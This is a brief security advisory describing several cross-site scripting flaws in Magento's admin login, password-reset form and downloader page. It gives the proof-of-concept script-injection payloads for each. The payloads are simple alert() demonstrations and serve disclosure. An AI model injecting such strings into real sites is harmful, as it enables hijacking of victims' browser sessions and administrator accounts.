|
|
Magento Multiple Cross Site Scripting Vulnerabilities
An attacker can exploit these issues by enticing an unsuspecting victim to follow a malicious URI. The following examples are available: http://www.example.com/index.php/admin/ Username: "><script>alert('xss')</script> http://www.example.com/index.php/admin/index/forgotpassword/ Email address: "><script>alert('xss')</script> http://www.example.com/downloader/?return=%22%3Cscript%3Ealert('xss')%3C/script%3E |
|
Privacy Statement |